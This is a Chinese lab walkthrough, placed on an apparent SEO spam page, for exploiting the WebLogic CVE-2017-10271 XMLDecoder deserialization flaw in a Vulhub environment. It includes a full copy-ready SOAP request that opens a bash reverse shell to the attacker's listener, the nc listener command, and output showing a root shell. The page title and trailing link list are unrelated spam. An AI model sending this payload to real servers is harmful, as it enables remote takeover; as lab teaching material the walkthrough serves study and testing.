当前位置: 首页 > news >正文

公司没有网站如何做外贸百度快速收录提交工具

公司没有网站如何做外贸,百度快速收录提交工具,中国优秀网站建设官网,自已做好的网站怎么做后台漏洞成因 Weblogic的WLS Security组件对外提供 webservice服务 其中使用了XMLDecoder来 解析用户传入的XML数据 在解析的过程中出现 反序列化漏洞 ,导致可执行任意命令 原理:https://xz.aliyun.com/t/10172 靶场部署 1.进入靶场目录 cd /vulhub-maste…

漏洞成因

Weblogic的WLS Security组件对外提供 webservice服务

其中使用了XMLDecoder来 解析用户传入的XML数据

在解析的过程中出现 反序列化漏洞 ,导致可执行任意命令
原理:https://xz.aliyun.com/t/10172

靶场部署

1.进入靶场目录

cd /vulhub-master/weblogic/CVE-2017-10271

2.开启靶场【报错重启docker服务】

[root@localhost CVE-2017-10271]# docker-compose up -d
 
3.查看靶场端口

[root@localhost CVE-2017-10271]# docker ps

 4.访问靶场

192.168.10.5:7001

漏洞利用

1.漏洞发生页

192.168.10.5:7001/wls-wsat/CoordinatorPortType

2.配置poc

192.168.10.5 改成你的CentOS IP
192.168.10.128 改成你的Kali IP
8888 改成你的Kali监听端口

==========从以下内容开始复制==========
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.10.5:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 640

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.10.128/8888 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

3.kali监听 8888 端口

nc -lvp 8888

4.bp发送poc请求包

修改右上角 Target

 

 粘贴并发送

5.连接建立成功

 

┌──(root㉿kali)-[~]
└─# nc -lvp 8888
listening on [any] 8888 ...
192.168.10.5: inverse host lookup failed: Unknown host
connect to [192.168.10.128] from (UNKNOWN) [192.168.10.5] 45432
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@af29889df405:~/Oracle/Middleware/user_projects/domains/base_domain# 

http://www.khdw.cn/news/70251.html

相关文章:

  • 企业所得税税率是多少网站的排名优化怎么做
  • 网站鉴赏天津搜索引擎推广
  • 织梦模板怎么单独做移动端网站网络科技公司网站建设
  • 兴义市住房和城乡建设局网站广州网络公司
  • 长寿做网站手机百度seo快速排名
  • 网络营销的主要方式和技巧seo新人怎么发外链
  • 企业商务网站建设论文百度大搜推广
  • 郴州新网0735青岛seo博客
  • 程序员不是做网站的百度智能小程序怎么优化排名
  • 保定有那些网站免费永久注册顶级域名网站
  • wordpress添加产品图seo小白入门教学
  • 做网站客户拖着不验收软件开发工资一般多少
  • 怎么做可以把网站图片保存下来百度站长
  • sublime怎么做网站搜索引擎优化期末考试答案
  • 浏览器主页宁波正规优化seo公司
  • 淘宝客领券网站怎么做哪个网站学seo是免费的
  • 自助建网站平台怎么收费怎么安装百度
  • 婚庆网站开发计划书深圳外包seo
  • 如何做网站链接网络推广的方式有哪些?
  • 做异性的视频网站有哪些公司排名seo
  • 信誉好的郑州网站建设百度竞价推广自己可以做吗
  • 做那种事免费网站好的产品怎么推广语言
  • 天津网站建设zmweb百度seo推广怎么做
  • 珠宝网站设计文案百度权重查询爱站网
  • 网站策划过程seo服务销售招聘
  • 2017年网站推广怎么做泉州搜索推广
  • 燕郊网站建设营销型网站建设报价
  • 天津开发区网站设计公司高端网站建设深圳
  • 顶级策划公司网络营销推广优化
  • 互联网营销 网站 推荐seo软文推广